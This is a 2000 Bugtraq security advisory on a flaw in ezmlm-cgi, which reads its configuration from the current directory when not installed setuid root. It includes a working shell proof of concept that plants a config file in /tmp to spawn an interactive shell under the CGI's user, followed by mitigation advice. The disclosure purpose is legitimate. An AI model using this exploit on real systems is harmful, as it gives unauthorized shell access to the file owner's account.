Date: Tue, 5 Dec 2000 10:19:51 +1100 From: vort-fu <vort@WIRETAPPED.NET> Subject: ezmlm-cgi To: BUGTRAQ@SECURITYFOCUS.COM Package : ezmlm-0.53 and below (ezmlm-cgi) Announced: 2000-12-05 Ezmlm is an easy to use mailing list manager for qmail. It ships with a cgi application to allow for list archiving and reviewal over the web. Documentation states that the cgi should be installed suid root, but in real world environments, many are not likely to blindly setuid root any file they havent coded themselves (and then some). Typically this file is setuid user x, allowing for the cgi to access the mailing list configurations for that particular user. However, when not installed suid root, ezmlm-cgi will attempt to read the configuration file from the cwd instead of /etc/ezmlm/. Thus one can create their own configuration files and have ezmlm-cgi execute any arbitary commands under the euid of the file. example code #!/bin/sh # # ezmlm-cgi # vort@wiretapped.net cd /tmp export HTTP_HOST=x export SERVER_NAME=x export SCRIPT_NAME=x echo "0;1005;/home/2600/list;/tmp/x@/tmp/x;;;;/bin/sh" > /tmp/.ezcgirc echo "#!/bin/sh" > /tmp/x echo "/bin/sh -i" >> /tmp/x chmod +x /tmp/x /home/2600/2600-cgi/ezmlm-cgi rm -rf /tmp/x rm -rf /tmp/.ezcgirc It is interesting to note that for a file which asks to be installed suid root, it doesnt drop privs when executing the banner directive of the configuration file nor make any attempts to read the configuration from the base directory where the program is stored. Actually having this script suid root will fix this particular bug, but I wouldnt be surprised if there were many others in the code, I advise removing or disabling this cgi until an official patch has been released. vortfu vort@wiretapped.net